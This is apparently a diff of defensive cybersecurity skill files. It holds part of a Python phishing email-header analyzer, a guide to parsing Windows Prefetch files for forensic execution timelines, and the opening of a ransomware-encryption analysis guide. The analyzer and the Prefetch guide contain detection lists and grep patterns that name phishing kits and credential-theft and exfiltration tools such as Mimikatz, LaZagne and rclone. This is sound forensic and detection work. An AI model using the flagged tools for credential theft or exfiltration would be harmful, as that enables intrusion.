spf_domain_match = re.search(r'smtp\.mailfrom=([\w.\-@]+)', auth_header, re.IGNORECASE)
|
||||
if spf_domain_match:
|
||||
result.spf_domain = spf_domain_match.group(1)
|
||||
|
||||
dkim_match = re.search(r'dkim=(pass|fail|none|neutral|temperror|permerror)',
|
||||
auth_header, re.IGNORECASE)
|
||||
if dkim_match:
|
||||
result.dkim = dkim_match.group(1).lower()
|
||||
|
||||
dkim_domain_match = re.search(r'header\.[di]=([\w.\-]+)', auth_header, re.IGNORECASE)
|
||||
if dkim_domain_match:
|
||||
result.dkim_domain = dkim_domain_match.group(1)
|
||||
|
||||
dmarc_match = re.search(r'dmarc=(pass|fail|none|bestguesspass|temperror|permerror)',
|
||||
auth_header, re.IGNORECASE)
|
||||
if dmarc_match:
|
||||
result.dmarc = dmarc_match.group(1).lower()
|
||||
|
||||
dmarc_domain_match = re.search(r'header\.from=([\w.\-]+)', auth_header, re.IGNORECASE)
|
||||
if dmarc_domain_match:
|
||||
result.dmarc_domain = dmarc_domain_match.group(1)
|
||||
|
||||
compauth_match = re.search(r'compauth=(\w+)', auth_header, re.IGNORECASE)
|
||||
if compauth_match:
|
||||
result.compauth = compauth_match.group(1)
|
||||
|
||||
return result
|
||||
|
||||
|
||||
def geolocate_ip(ip_address: str) -> str:
|
||||
"""Geolocate an IP address using ip-api.com (free, no key required)."""
|
||||
if not HAS_REQUESTS or not ip_address:
|
||||
return "unknown"
|
||||
try:
|
||||
resp = requests.get(f"http://ip-api.com/json/{ip_address}",
|
||||
timeout=5,
|
||||
params={"fields": "country,city,org,status"})
|
||||
if resp.status_code == 200:
|
||||
data = resp.json()
|
||||
if data.get("status") == "success":
|
||||
return f"{data.get('city', '')}, {data.get('country', '')} ({data.get('org', '')})"
|
||||
except Exception:
|
||||
pass
|
||||
return "unknown"
|
||||
|
||||
|
||||
def reverse_dns_lookup(ip_address: str) -> str:
|
||||
"""Perform reverse DNS lookup on an IP address."""
|
||||
if not ip_address:
|
||||
return ""
|
||||
try:
|
||||
hostname = socket.gethostbyaddr(ip_address)
|
||||
return hostname[0]
|
||||
except (socket.herror, socket.gaierror, OSError):
|
||||
return ""
|
||||
|
||||
|
||||
def check_abuseipdb(ip_address: str, api_key: str = "") -> dict:
|
||||
"""Check IP against AbuseIPDB (requires API key)."""
|
||||
if not HAS_REQUESTS or not api_key or not ip_address:
|
||||
return {}
|
||||
try:
|
||||
headers = {"Key": api_key, "Accept": "application/json"}
|
||||
params = {"ipAddress": ip_address, "maxAgeInDays": "90"}
|
||||
resp = requests.get("https://api.abuseipdb.com/api/v2/check",
|
||||
headers=headers, params=params, timeout=10)
|
||||
if resp.status_code == 200:
|
||||
return resp.json().get("data", {})
|
||||
except Exception:
|
||||
pass
|
||||
return {}
|
||||
|
||||
|
||||
def analyze_indicators(analysis: HeaderAnalysis) -> list:
|
||||
"""Detect phishing indicators from parsed header data."""
|
||||
indicators = []
|
||||
|
||||
# Check From vs Return-Path mismatch
|
||||
if (analysis.from_domain and analysis.return_path_domain and
|
||||
analysis.from_domain != analysis.return_path_domain):
|
||||
indicators.append(PhishingIndicator(
|
||||
category="sender_mismatch",
|
||||
description=f"From domain ({analysis.from_domain}) differs from "
|
||||
f"Return-Path domain ({analysis.return_path_domain})",
|
||||
severity="high",
|
||||
raw_value=f"From: {analysis.from_domain}, Return-Path: {analysis.return_path_domain}"
|
||||
))
|
||||
|
||||
# Check From vs Reply-To mismatch
|
||||
if (analysis.from_domain and analysis.reply_to_domain and
|
||||
analysis.from_domain != analysis.reply_to_domain):
|
||||
indicators.append(PhishingIndicator(
|
||||
category="reply_to_mismatch",
|
||||
description=f"From domain ({analysis.from_domain}) differs from "
|
||||
f"Reply-To domain ({analysis.reply_to_domain})",
|
||||
severity="high",
|
||||
raw_value=f"From: {analysis.from_domain}, Reply-To: {analysis.reply_to_domain}"
|
||||
))
|
||||
|
||||
# Check SPF failure
|
||||
if analysis.authentication.spf in ("fail", "softfail"):
|
||||
indicators.append(PhishingIndicator(
|
||||
category="authentication_failure",
|
||||
description=f"SPF check returned {analysis.authentication.spf}",
|
||||
severity="high" if analysis.authentication.spf == "fail" else "medium",
|
||||
raw_value=f"spf={analysis.authentication.spf}"
|
||||
))
|
||||
|
||||
# Check DKIM failure
|
||||
if analysis.authentication.dkim == "fail":
|
||||
indicators.append(PhishingIndicator(
|
||||
category="authentication_failure",
|
||||
description="DKIM signature verification failed",
|
||||
severity="high",
|
||||
raw_value="dkim=fail"
|
||||
))
|
||||
|
||||
# Check DMARC failure
|
||||
if analysis.authentication.dmarc == "fail":
|
||||
indicators.append(PhishingIndicator(
|
||||
category="authentication_failure",
|
||||
description="DMARC policy check failed",
|
||||
severity="critical",
|
||||
raw_value="dmarc=fail"
|
||||
))
|
||||
|
||||
# Check for missing Message-ID
|
||||
if not analysis.message_id:
|
||||
indicators.append(PhishingIndicator(
|
||||
category="missing_header",
|
||||
description="Message-ID header is missing",
|
||||
severity="medium",
|
||||
raw_value=""
|
||||
))
|
||||
|
||||
# Check for suspicious X-Mailer
|
||||
suspicious_mailers = [
|
||||
"PHPMailer", "King Phisher", "GoPhish", "Swaks",
|
||||
"Sendinblue", "Mass Mailer", "Bulk Mailer"
|
||||
]
|
||||
if analysis.x_mailer:
|
||||
for mailer in suspicious_mailers:
|
||||
if mailer.lower() in analysis.x_mailer.lower():
|
||||
indicators.append(PhishingIndicator(
|
||||
category="suspicious_mailer",
|
||||
description=f"Suspicious X-Mailer detected: {analysis.x_mailer}",
|
||||
severity="high",
|
||||
raw_value=analysis.x_mailer
|
||||
))
|
||||
break
|
||||
|
||||
# Check for too few received hops (direct injection)
|
||||
if len(analysis.received_hops) <= 1:
|
||||
indicators.append(PhishingIndicator(
|
||||
category="routing_anomaly",
|
||||
description="Very few Received hops - possible direct SMTP injection",
|
||||
severity="medium",
|
||||
raw_value=f"Hop count: {len(analysis.received_hops)}"
|
||||
))
|
||||
|
||||
# Check for missing authentication results
|
||||
auth = analysis.authentication
|
||||
if auth.spf == "none" and auth.dkim == "none" and auth.dmarc == "none":
|
||||
indicators.append(PhishingIndicator(
|
||||
category="no_authentication",
|
||||
description="No email authentication results found (SPF, DKIM, DMARC all absent)",
|
||||
severity="high",
|
||||
raw_value=""
|
||||
))
|
||||
|
||||
return indicators
|
||||
|
||||
|
||||
def calculate_risk_score(indicators: list) -> tuple:
|
||||
"""Calculate risk score from indicators. Returns (score, level)."""
|
||||
severity_weights = {"critical": 30, "high": 20, "medium": 10, "low": 5}
|
||||
score = 0
|
||||
for indicator in indicators:
|
||||
score += severity_weights.get(indicator.severity, 0)
|
||||
|
||||
score = min(score, 100)
|
||||
|
||||
if score >= 70:
|
||||
level = "CRITICAL"
|
||||
elif score >= 50:
|
||||
level = "HIGH"
|
||||
elif score >= 30:
|
||||
level = "MEDIUM"
|
||||
elif score >= 10:
|
||||
level = "LOW"
|
||||
else:
|
||||
level = "CLEAN"
|
||||
|
||||
return score, level
|
||||
|
||||
|
||||
def analyze_headers(raw_headers: str, enrich: bool = False,
|
||||
abuseipdb_key: str = "") -> HeaderAnalysis:
|
||||
"""
|
||||
Main analysis function. Parses raw email headers and produces
|
||||
a complete HeaderAnalysis report.
|
||||
"""
|
||||
analysis = HeaderAnalysis()
|
||||
|
||||
# Calculate hash of raw input for evidence tracking
|
||||
analysis.file_hash = hashlib.sha256(raw_headers.encode()).hexdigest()
|
||||
|
||||
# Parse using Python's email library
|
||||
parser = HeaderParser()
|
||||
msg = parser.parsestr(raw_headers)
|
||||
|
||||
# Extract basic fields
|
||||
analysis.from_address = msg.get("From", "")
|
||||
analysis.from_domain = extract_domain(analysis.from_address)
|
||||
analysis.return_path = msg.get("Return-Path", "")
|
||||
analysis.return_path_domain = extract_domain(analysis.return_path)
|
||||
analysis.reply_to = msg.get("Reply-To", "")
|
||||
analysis.reply_to_domain = extract_domain(analysis.reply_to)
|
||||
analysis.message_id = msg.get("Message-ID", "")
|
||||
analysis.subject = msg.get("Subject", "")
|
||||
analysis.date = msg.get("Date", "")
|
||||
analysis.x_mailer = msg.get("X-Mailer", "") or msg.get("User-Agent", "")
|
||||
|
||||
# Extract X-Originating-IP
|
||||
x_orig = msg.get("X-Originating-IP", "")
|
||||
if x_orig:
|
||||
ip_match = re.search(r'(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})', x_orig)
|
||||
if ip_match:
|
||||
analysis.x_originating_ip = ip_match.group(1)
|
||||
|
||||
# Parse Received headers (they appear in reverse order)
|
||||
received_headers = msg.get_all("Received", [])
|
||||
for i, received in enumerate(received_headers):
|
||||
hop = parse_received_header(received, len(received_headers) - i)
|
||||
if enrich and hop.ip_address:
|
||||
hop.geo_location = geolocate_ip(hop.ip_address)
|
||||
hop.reverse_dns = reverse_dns_lookup(hop.ip_address)
|
||||
analysis.received_hops.append(hop)
|
||||
|
||||
# Reverse to chronological order (first hop first)
|
||||
analysis.received_hops.reverse()
|
||||
|
||||
# Parse Authentication-Results
|
||||
auth_results = msg.get("Authentication-Results", "")
|
||||
if auth_results:
|
||||
analysis.authentication = parse_authentication_results(auth_results)
|
||||
|
||||
# Also check ARC-Authentication-Results
|
||||
arc_auth = msg.get("ARC-Authentication-Results", "")
|
||||
if arc_auth and analysis.authentication.spf == "none":
|
||||
analysis.authentication = parse_authentication_results(arc_auth)
|
||||
|
||||
# Extract URLs from headers
|
||||
url_pattern = r'https?://[^\s<>"\')\]>]+'
|
||||
all_header_text = raw_headers
|
||||
analysis.urls_in_headers = list(set(re.findall(url_pattern, all_header_text)))
|
||||
|
||||
# Detect phishing indicators
|
||||
analysis.indicators = analyze_indicators(analysis)
|
||||
|
||||
# Calculate risk score
|
||||
analysis.risk_score, analysis.risk_level = calculate_risk_score(analysis.indicators)
|
||||
|
||||
# Enrich with threat intelligence if requested
|
||||
if enrich and analysis.x_originating_ip and abuseipdb_key:
|
||||
abuse_data = check_abuseipdb(analysis.x_originating_ip, abuseipdb_key)
|
||||
if abuse_data and abuse_data.get("abuseConfidenceScore", 0) > 50:
|
||||
analysis.indicators.append(PhishingIndicator(
|
||||
category="threat_intelligence",
|
||||
description=f"IP {analysis.x_originating_ip} has abuse confidence "
|
||||
f"score of {abuse_data['abuseConfidenceScore']}%",
|
||||
severity="critical",
|
||||
raw_value=json.dumps(abuse_data)
|
||||
))
|
||||
# Recalculate risk
|
||||
analysis.risk_score, analysis.risk_level = calculate_risk_score(analysis.indicators)
|
||||
|
||||
return analysis
|
||||
|
||||
|
||||
def format_report(analysis: HeaderAnalysis) -> str:
|
||||
"""Format analysis results as a human-readable report."""
|
||||
lines = []
|
||||
lines.append("=" * 70)
|
||||
lines.append(" PHISHING EMAIL HEADER ANALYSIS REPORT")
|
||||
lines.append("=" * 70)
|
||||
lines.append(f" Generated: {datetime.now(timezone.utc).isoformat()}")
|
||||
lines.append(f" Evidence Hash: {analysis.file_hash[:16]}...")
|
||||
lines.append("")
|
||||
|
||||
# Risk Assessment
|
||||
lines.append(f" RISK LEVEL: {analysis.risk_level} (Score: {analysis.risk_score}/100)")
|
||||
lines.append("-" * 70)
|
||||
|
||||
# Sender Information
|
||||
lines.append("\n[SENDER INFORMATION]")
|
||||
lines.append(f" From: {analysis.from_address}")
|
||||
lines.append(f" Return-Path: {analysis.return_path}")
|
||||
lines.append(f" Reply-To: {analysis.reply_to}")
|
||||
lines.append(f" Subject: {analysis.subject}")
|
||||
lines.append(f" Date: {analysis.date}")
|
||||
lines.append(f" Message-ID: {analysis.message_id}")
|
||||
lines.append(f" X-Mailer: {analysis.x_mailer}")
|
||||
if analysis.x_originating_ip:
|
||||
lines.append(f" Origin IP: {analysis.x_originating_ip}")
|
||||
|
||||
# Authentication Results
|
||||
lines.append("\n[AUTHENTICATION RESULTS]")
|
||||
auth = analysis.authentication
|
||||
spf_icon = "PASS" if auth.spf == "pass" else "FAIL" if auth.spf in ("fail", "softfail") else "NONE"
|
||||
dkim_icon = "PASS" if auth.dkim == "pass" else "FAIL" if auth.dkim == "fail" else "NONE"
|
||||
dmarc_icon = "PASS" if auth.dmarc == "pass" else "FAIL" if auth.dmarc == "fail" else "NONE"
|
||||
lines.append(f" SPF: {spf_icon} ({auth.spf}) domain={auth.spf_domain}")
|
||||
lines.append(f" DKIM: {dkim_icon} ({auth.dkim}) domain={auth.dkim_domain}")
|
||||
lines.append(f" DMARC: {dmarc_icon} ({auth.dmarc}) domain={auth.dmarc_domain}")
|
||||
|
||||
# Routing Path
|
||||
lines.append(f"\n[ROUTING PATH] ({len(analysis.received_hops)} hops)")
|
||||
for hop in analysis.received_hops:
|
||||
lines.append(f" Hop {hop.hop_number}: {hop.server_from} -> {hop.server_by}")
|
||||
if hop.ip_address:
|
||||
lines.append(f" IP: {hop.ip_address}")
|
||||
if hop.geo_location and hop.geo_location != "unknown":
|
||||
lines.append(f" Location: {hop.geo_location}")
|
||||
if hop.protocol:
|
||||
lines.append(f" Protocol: {hop.protocol}")
|
||||
if hop.timestamp:
|
||||
lines.append(f" Time: {hop.timestamp}")
|
||||
|
||||
# Phishing Indicators
|
||||
if analysis.indicators:
|
||||
lines.append(f"\n[PHISHING INDICATORS] ({len(analysis.indicators)} found)")
|
||||
for i, ind in enumerate(analysis.indicators, 1):
|
||||
lines.append(f" {i}. [{ind.severity.upper()}] {ind.description}")
|
||||
if ind.raw_value:
|
||||
lines.append(f" Value: {ind.raw_value}")
|
||||
else:
|
||||
lines.append("\n[PHISHING INDICATORS] None detected")
|
||||
|
||||
# URLs in Headers
|
||||
if analysis.urls_in_headers:
|
||||
lines.append(f"\n[URLS IN HEADERS] ({len(analysis.urls_in_headers)} found)")
|
||||
for url in analysis.urls_in_headers[:10]:
|
||||
lines.append(f" - {url}")
|
||||
|
||||
lines.append("\n" + "=" * 70)
|
||||
lines.append(" END OF REPORT")
|
||||
lines.append("=" * 70)
|
||||
|
||||
return "\n".join(lines)
|
||||
|
||||
|
||||
def main():
|
||||
parser = argparse.ArgumentParser(
|
||||
description="Analyze email headers for phishing indicators"
|
||||
)
|
||||
input_group = parser.add_mutually_exclusive_group(required=True)
|
||||
input_group.add_argument("--file", "-f", help="Path to file containing raw headers")
|
||||
input_group.add_argument("--eml", "-e", help="Path to .eml file")
|
||||
input_group.add_argument("--stdin", action="store_true", help="Read headers from stdin")
|
||||
|
||||
parser.add_argument("--enrich", action="store_true",
|
||||
help="Enrich with IP geolocation and reverse DNS")
|
||||
parser.add_argument("--abuseipdb-key", default="",
|
||||
help="AbuseIPDB API key for threat intelligence")
|
||||
parser.add_argument("--json", action="store_true",
|
||||
help="Output results as JSON")
|
||||
parser.add_argument("--output", "-o", help="Write report to file")
|
||||
|
||||
args = parser.parse_args()
|
||||
|
||||
# Read input
|
||||
if args.stdin:
|
||||
raw_headers = sys.stdin.read()
|
||||
elif args.eml:
|
||||
with open(args.eml, "rb") as f:
|
||||
msg = BytesParser(policy=policy.default).parse(f)
|
||||
raw_headers = str(msg)
|
||||
else:
|
||||
with open(args.file, "r", encoding="utf-8", errors="replace") as f:
|
||||
raw_headers = f.read()
|
||||
|
||||
# Analyze
|
||||
analysis = analyze_headers(
|
||||
raw_headers,
|
||||
enrich=args.enrich,
|
||||
abuseipdb_key=args.abuseipdb_key
|
||||
)
|
||||
|
||||
# Output
|
||||
if args.json:
|
||||
output = json.dumps(asdict(analysis), indent=2, default=str)
|
||||
else:
|
||||
output = format_report(analysis)
|
||||
|
||||
if args.output:
|
||||
with open(args.output, "w", encoding="utf-8") as f:
|
||||
f.write(output)
|
||||
print(f"Report written to {args.output}")
|
||||
else:
|
||||
print(output)
|
||||
|
||||
# Exit code based on risk
|
||||
if analysis.risk_level in ("CRITICAL", "HIGH"):
|
||||
sys.exit(2)
|
||||
elif analysis.risk_level == "MEDIUM":
|
||||
sys.exit(1)
|
||||
else:
|
||||
sys.exit(0)
|
||||
|
||||
|
||||
if __name__ == "__main__":
|
||||
main()
|
||||
@@ -0,0 +1,311 @@
|
||||
---
|
||||
name: analyzing-prefetch-files-for-execution-history
|
||||
description: Parse Windows Prefetch files to determine program execution history including run counts, timestamps, and referenced files for forensic investigation.
|
||||
domain: cybersecurity
|
||||
subdomain: digital-forensics
|
||||
tags: [forensics, prefetch, windows-artifacts, execution-history, timeline-analysis, evidence-collection]
|
||||
version: "1.0"
|
||||
author: mahipal
|
||||
license: MIT
|
||||
---
|
||||
|
||||
# Analyzing Prefetch Files for Execution History
|
||||
|
||||
## When to Use
|
||||
- When determining which programs were executed on a Windows system and when
|
||||
- During malware investigations to confirm execution of suspicious binaries
|
||||
- For establishing a timeline of application usage during an incident
|
||||
- When correlating program execution with other forensic artifacts
|
||||
- To identify anti-forensic tools or unauthorized software that was run
|
||||
|
||||
## Prerequisites
|
||||
- Access to Windows Prefetch directory (C:\Windows\Prefetch\) from forensic image
|
||||
- PECmd (Eric Zimmerman), WinPrefetchView, or python-prefetch parser
|
||||
- Understanding of Prefetch file format (versions 17, 23, 26, 30)
|
||||
- Windows system with Prefetch enabled (default on client OS, disabled on servers)
|
||||
- Knowledge of Prefetch naming conventions (APPNAME-HASH.pf)
|
||||
|
||||
## Workflow
|
||||
|
||||
### Step 1: Extract Prefetch Files from Forensic Image
|
||||
|
||||
```bash
|
||||
# Mount the forensic image
|
||||
mount -o ro,loop,offset=$((2048*512)) /cases/case-2024-001/images/evidence.dd /mnt/evidence
|
||||
|
||||
# Copy all prefetch files
|
||||
mkdir -p /cases/case-2024-001/prefetch/
|
||||
cp /mnt/evidence/Windows/Prefetch/*.pf /cases/case-2024-001/prefetch/
|
||||
|
||||
# Count and list prefetch files
|
||||
ls -la /cases/case-2024-001/prefetch/ | wc -l
|
||||
ls -la /cases/case-2024-001/prefetch/ | head -30
|
||||
|
||||
# Hash all prefetch files for integrity
|
||||
sha256sum /cases/case-2024-001/prefetch/*.pf > /cases/case-2024-001/prefetch/pf_hashes.txt
|
||||
|
||||
# Note: Prefetch filename format is EXECUTABLE_NAME-XXXXXXXX.pf
|
||||
# The hash (XXXXXXXX) is based on the executable path
|
||||
# Same executable from different paths creates different prefetch files
|
||||
```
|
||||
|
||||
### Step 2: Parse Prefetch Files with PECmd
|
||||
|
||||
```bash
|
||||
# Using Eric Zimmerman's PECmd (Windows or via Mono/Wine on Linux)
|
||||
# Download from https://ericzimmerman.github.io/
|
||||
|
||||
# Parse a single prefetch file
|
||||
PECmd.exe -f "C:\cases\prefetch\POWERSHELL.EXE-A]B2C3D4.pf"
|
||||
|
||||
# Parse all prefetch files and output to CSV
|
||||
PECmd.exe -d "C:\cases\prefetch\" --csv "C:\cases\analysis\" --csvf prefetch_results.csv
|
||||
|
||||
# Parse with JSON output
|
||||
PECmd.exe -d "C:\cases\prefetch\" --json "C:\cases\analysis\" --jsonf prefetch_results.json
|
||||
|
||||
# Output includes for each file:
|
||||
# - Executable name and path
|
||||
# - Run count
|
||||
# - Last run time (up to 8 timestamps in Windows 10)
|
||||
# - Files and directories referenced during execution
|
||||
# - Volume information (serial number, creation date)
|
||||
# - Prefetch file creation time
|
||||
```
|
||||
|
||||
### Step 3: Parse with Python for Linux-Based Analysis
|
||||
|
||||
```bash
|
||||
pip install prefetch
|
||||
|
||||
python3 << 'PYEOF'
|
||||
import os
|
||||
import json
|
||||
from datetime import datetime
|
||||
|
||||
# Parse prefetch files using python
|
||||
import struct
|
||||
|
||||
def parse_prefetch(filepath):
|
||||
"""Parse a Windows Prefetch file."""
|
||||
with open(filepath, 'rb') as f:
|
||||
data = f.read()
|
||||
|
||||
# Check for MAM compressed format (Windows 10)
|
||||
if data[:4] == b'MAM\x04':
|
||||
import lznt1 # or use DecompressBuffer
|
||||
# Windows 10 prefetch files are compressed
|
||||
print(f" [Compressed Win10 format - use PECmd for full parsing]")
|
||||
return None
|
||||
|
||||
# Version 17 (XP), 23 (Vista/7), 26 (8.1), 30 (10)
|
||||
version = struct.unpack('<I', data[0:4])[0]
|
||||
signature = data[4:8]
|
||||
|
||||
if signature != b'SCCA':
|
||||
print(f" Invalid prefetch signature")
|
||||
return None
|
||||
|
||||
file_size = struct.unpack('<I', data[8:12])[0]
|
||||
exec_name = data[16:76].decode('utf-16-le').strip('\x00')
|
||||
run_count = struct.unpack('<I', data[208:212])[0] if version >= 23 else struct.unpack('<I', data[144:148])[0]
|
||||
|
||||
result = {
|
||||
'version': version,
|
||||
'executable': exec_name,
|
||||
'file_size': file_size,
|
||||
'run_count': run_count,
|
||||
}
|
||||
|
||||
# Extract last execution timestamps
|
||||
if version == 23: # Vista/7 - 1 timestamp
|
||||
ts = struct.unpack('<Q', data[128:136])[0]
|
||||
result['last_run'] = filetime_to_datetime(ts)
|
||||
elif version >= 26: # Win8+ - up to 8 timestamps
|
||||
timestamps = []
|
||||
for i in range(8):
|
||||
ts = struct.unpack('<Q', data[128+i*8:136+i*8])[0]
|
||||
if ts > 0:
|
||||
timestamps.append(filetime_to_datetime(ts))
|
||||
result['last_run_times'] = timestamps
|
||||
|
||||
return result
|
||||
|
||||
def filetime_to_datetime(ft):
|
||||
"""Convert Windows FILETIME to datetime string."""
|
||||
if ft == 0:
|
||||
return None
|
||||
timestamp = (ft - 116444736000000000) / 10000000
|
||||
try:
|
||||
return datetime.utcfromtimestamp(timestamp).strftime('%Y-%m-%d %H:%M:%S UTC')
|
||||
except (OSError, ValueError):
|
||||
return None
|
||||
|
||||
# Process all prefetch files
|
||||
prefetch_dir = '/cases/case-2024-001/prefetch/'
|
||||
results = []
|
||||
|
||||
for filename in sorted(os.listdir(prefetch_dir)):
|
||||
if filename.lower().endswith('.pf'):
|
||||
filepath = os.path.join(prefetch_dir, filename)
|
||||
print(f"\n=== {filename} ===")
|
||||
result = parse_prefetch(filepath)
|
||||
if result:
|
||||
print(f" Executable: {result['executable']}")
|
||||
print(f" Run Count: {result['run_count']}")
|
||||
if 'last_run' in result:
|
||||
print(f" Last Run: {result['last_run']}")
|
||||
elif 'last_run_times' in result:
|
||||
for i, ts in enumerate(result['last_run_times']):
|
||||
print(f" Run Time {i+1}: {ts}")
|
||||
results.append(result)
|
||||
|
||||
# Save results
|
||||
with open('/cases/case-2024-001/analysis/prefetch_analysis.json', 'w') as f:
|
||||
json.dump(results, f, indent=2)
|
||||
PYEOF
|
||||
```
|
||||
|
||||
### Step 4: Identify Suspicious Execution Evidence
|
||||
|
||||
```bash
|
||||
# Search for known malicious tool names in prefetch
|
||||
ls /cases/case-2024-001/prefetch/ | grep -iE \
|
||||
'(MIMIKATZ|PSEXEC|WMIC|COBALT|BEACON|PWDUMP|PROCDUMP|LAZAGNE|RUBEUS|BLOODHOUND|SHARPHOUND|CERTUTIL|BITSADMIN)'
|
||||
|
||||
# Search for script interpreters (potential malicious execution)
|
||||
ls /cases/case-2024-001/prefetch/ | grep -iE \
|
||||
'(POWERSHELL|CMD\.EXE|WSCRIPT|CSCRIPT|MSHTA|REGSVR32|RUNDLL32|MSIEXEC)'
|
||||
|
||||
# Search for remote access tools
|
||||
ls /cases/case-2024-001/prefetch/ | grep -iE \
|
||||
'(TEAMVIEWER|ANYDESK|LOGMEIN|VNC|SPLASHTOP|SCREENCONNECT|AMMYY)'
|
||||
|
||||
# Search for data exfiltration tools
|
||||
ls /cases/case-2024-001/prefetch/ | grep -iE \
|
||||
'(RAR|7Z|ZIP|RCLONE|MEGA|DROPBOX|ONEDRIVE|GDRIVE|FTP|CURL|WGET)'
|
||||
|
||||
# Find recently created prefetch files (newest executables run)
|
||||
ls -lt /cases/case-2024-001/prefetch/ | head -20
|
||||
|
||||
# Cross-reference with Shimcache and Amcache for confirmation
|
||||
# Prefetch existence = program was executed at least once
|
||||
```
|
||||
|
||||
### Step 5: Build Execution Timeline
|
||||
|
||||
```bash
|
||||
# Create timeline from prefetch data
|
||||
python3 << 'PYEOF'
|
||||
import json
|
||||
import csv
|
||||
|
||||
with open('/cases/case-2024-001/analysis/prefetch_analysis.json') as f:
|
||||
data = json.load(f)
|
||||
|
||||
timeline = []
|
||||
for entry in data:
|
||||
if 'last_run_times' in entry:
|
||||
for ts in entry['last_run_times']:
|
||||
if ts:
|
||||
timeline.append({
|
||||
'timestamp': ts,
|
||||
'executable': entry['executable'],
|
||||
'run_count': entry['run_count'],
|
||||
'source': 'Prefetch'
|
||||
})
|
||||
elif 'last_run' in entry and entry['last_run']:
|
||||
timeline.append({
|
||||
'timestamp': entry['last_run'],
|
||||
'executable': entry['executable'],
|
||||
'run_count': entry['run_count'],
|
||||
'source': 'Prefetch'
|
||||
})
|
||||
|
||||
# Sort chronologically
|
||||
timeline.sort(key=lambda x: x['timestamp'])
|
||||
|
||||
# Write timeline CSV
|
||||
with open('/cases/case-2024-001/analysis/execution_timeline.csv', 'w', newline='') as f:
|
||||
writer = csv.DictWriter(f, fieldnames=['timestamp', 'executable', 'run_count', 'source'])
|
||||
writer.writeheader()
|
||||
writer.writerows(timeline)
|
||||
|
||||
# Print suspicious time window
|
||||
for entry in timeline:
|
||||
if '2024-01-15' in entry['timestamp'] or '2024-01-16' in entry['timestamp']:
|
||||
print(f" {entry['timestamp']} | {entry['executable']} (x{entry['run_count']})")
|
||||
PYEOF
|
||||
```
|
||||
|
||||
## Key Concepts
|
||||
|
||||
| Concept | Description |
|
||||
|---------|-------------|
|
||||
| Prefetch | Windows performance optimization that pre-loads application data and tracks execution |
|
||||
| SCCA signature | Magic bytes identifying a valid Prefetch file |
|
||||
| Path hash | CRC-based hash of the executable path forming part of the .pf filename |
|
||||
| Run count | Number of times the executable has been launched (may wrap around) |
|
||||
| Last run timestamps | Windows 8+ stores up to 8 most recent execution timestamps |
|
||||
| Referenced files | List of files and directories accessed during the first 10 seconds of execution |
|
||||
| Volume information | Drive serial number and creation date identifying the source volume |
|
||||
| MAM compression | Windows 10 Prefetch files use MAM4 compression requiring decompression before parsing |
|
||||
|
||||
## Tools & Systems
|
||||
|
||||
| Tool | Purpose |
|
||||
|------|---------|
|
||||
| PECmd | Eric Zimmerman's Prefetch parser with CSV/JSON output |
|
||||
| WinPrefetchView | NirSoft GUI tool for viewing Prefetch files |
|
||||
| python-prefetch | Python library for parsing Prefetch files |
|
||||
| Prefetch Hash Calculator | Tool to calculate expected hash from executable paths |
|
||||
| KAPE | Automated artifact collection including Prefetch |
|
||||
| Autopsy | Forensic platform with Prefetch analysis module |
|
||||
| Plaso/log2timeline | Super-timeline tool that includes Prefetch parser |
|
||||
| Velociraptor | Endpoint agent with Prefetch collection and analysis artifacts |
|
||||
|
||||
## Common Scenarios
|
||||
|
||||
**Scenario 1: Confirming Malware Execution**
|
||||
Search Prefetch directory for the malware executable name, confirm execution via Prefetch existence, extract run count and last run time, identify referenced DLLs to understand malware behavior, correlate with registry autorun entries.
|
||||
|
||||
**Scenario 2: Attacker Tool Usage Timeline**
|
||||
Identify Prefetch files for PsExec, Mimikatz, BloodHound, and other attacker tools, build chronological timeline of tool execution, determine the sequence of the attack (reconnaissance, credential theft, lateral movement), match timestamps with network connection logs.
|
||||
|
||||
**Scenario 3: Data Staging and Exfiltration**
|
||||
Look for Prefetch entries of compression tools (7z, WinRAR, zip), identify execution of file transfer utilities (rclone, FTP clients), check for cloud storage client execution, timeline when data staging and transfer occurred.
|
||||
|
||||
**Scenario 4: Anti-Forensics Detection**
|
||||
Check for execution of known anti-forensic tools (CCleaner, Eraser, SDelete), identify if Prefetch directory was recently cleared (fewer files than expected for active system), note timestamps of anti-forensic tool execution relative to other evidence.
|
||||
|
||||
## Output Format
|
||||
|
||||
```
|
||||
Prefetch Analysis Summary:
|
||||
System: Windows 10 Pro (Build 19041)
|
||||
Prefetch Files: 234
|
||||
Analysis Period: All available execution history
|
||||
|
||||
Execution Statistics:
|
||||
Total unique executables: 234
|
||||
First execution: 2023-06-15 (system install)
|
||||
Latest execution: 2024-01-18 23:45 UTC
|
||||
|
||||
Suspicious Executions:
|
||||
MIMIKATZ.EXE-5F2A3B1C.pf
|
||||
Run Count: 3 | Last: 2024-01-16 02:30:15 UTC
|
||||
PSEXEC.EXE-AD70946C.pf
|
||||
Run Count: 7 | Last: 2024-01-16 02:45:30 UTC
|
||||
RCLONE.EXE-1F3E5A2B.pf
|
||||
Run Count: 2 | Last: 2024-01-17 03:15:00 UTC
|
||||
POWERSHELL.EXE-022A1004.pf
|
||||
Run Count: 145 | Last: 2024-01-18 14:00:00 UTC
|
||||
|
||||
Attack Timeline (from Prefetch):
|
||||
2024-01-15 14:32 - POWERSHELL.EXE (initial access)
|
||||
2024-01-16 02:30 - MIMIKATZ.EXE (credential theft)
|
||||
2024-01-16 02:45 - PSEXEC.EXE (lateral movement)
|
||||
2024-01-17 03:15 - RCLONE.EXE (data exfiltration)
|
||||
|
||||
Report: /cases/case-2024-001/analysis/execution_timeline.csv
|
||||
```
|
||||
@@ -0,0 +1,327 @@
|
||||
---
|
||||
name: analyzing-ransomware-encryption-mechanisms
|
||||
description: >
|
||||
Analyzes encryption algorithms, key management, and file encryption routines used by
|
||||
ransomware families to assess decryption feasibility, identify implementation weaknesses,
|
||||
and support recovery efforts. Covers AES, RSA, ChaCha20, and hybrid encryption schemes.
|
||||
Activates for requests involving ransomware cryptanalysis, encryption analysis, key
|
||||
recovery assessment, or ransomware decryption feasibility.
|
||||
domain: cybersecurity
|
||||
subdomain: malware-analysis
|
||||
tags: [malware, ransomware, encryption, cryptanalysis, reverse-engineering]
|
||||
version: 1.0.0
|
||||
author: mahipal
|
||||
license: MIT
|
||||
---
|
||||
|
||||
# Analyzing Ransomware Encryption Mechanisms
|
||||
|
||||
## When to Use
|
||||
|
||||
- A ransomware infection has occurred and recovery requires understanding the encryption scheme used
|
||||
- Assessing whether decryption is possible without paying the ransom (implementation flaws, known decryptors)
|
||||
